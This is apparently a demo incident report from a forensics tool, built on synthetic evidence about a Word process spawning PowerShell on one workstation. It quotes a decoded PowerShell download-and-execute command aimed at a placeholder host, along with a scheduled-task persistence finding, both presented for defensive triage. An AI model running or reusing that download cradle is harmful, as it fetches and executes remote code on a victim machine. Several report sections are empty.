PastePile

Incident investigation report

Reference C-0001 · Issued 2026-09-11 03:54:04 UTC

Demo case. The evidence in this case is synthetic and was generated by PastePile for demonstration. It is not real threat intelligence and does not describe any real organization.

What was examined

1 item(s) of evidence containing 22 record(s), covering 2026-08-24 09:05:11 UTC to 2026-08-24 10:51:02 UTC. Anything outside the evidence supplied is out of scope: nothing was collected, fetched or queried from your environment.

What was found

winword.exe started powershell.exe high

On WS-4471, winword.exe started powershell.exe. Office applications do not normally launch command interpreters. This is the behavior produced when a document runs a macro or an embedded object.

Recommended: Confirm with the user whether they opened a document at this time, and retrieve the document if so. If the activity was not expected, isolate the host before further triage.

PowerShell started with an encoded command high

On WS-4471, PowerShell was started with a base64-encoded command. The encoded payload decodes to: IEX (New-Object Net.WebClient).DownloadString('http://cdn-updates.example/stage2.ps1') It contains Invoke-Expression, Net.WebClient DownloadString.

Recommended: Decode and review the full command, then determine whether it corresponds to approved automation on this host.

Persistence requested from the command line (scheduled task) high

On WS-4471, A command requested scheduled task creation. It was run by powershell.exe. A persistence command launched by an interpreter or an Office application warrants investigation; the parent process does not establish malicious intent or whether the requested change succeeded.

Recommended: Check whether the requested task, service, autorun entry or WMI subscription exists and compare it with your change records. Remove any unauthorized artifact after confirming its presence.

Machines and accounts involved

WS-4471, r.okafor

What could not be determined

What we recommend

What was checked

13 check(s) ran against the evidence you supplied. 21 could not run, because the evidence they need was not part of what was submitted.

A check that could not run is not a check that found nothing. These were not assessed:

Supplying the evidence named above would let those checks run. Until then this report describes only what the submitted evidence shows.

How this was produced

The recorded outcomes above describe which evidence was processed and which checks ran. Receiving evidence alone does not mean analysis completed. No suspicious URL was visited, no attachment executed and no sample detonated. PastePile states what the supplied evidence supports and names what it does not establish; the decision about what to do remains yours.

Artificial intelligence. No language model was used in producing this case.


Findings are derived from the evidence supplied to this case and no other source.

Produced with PastePile.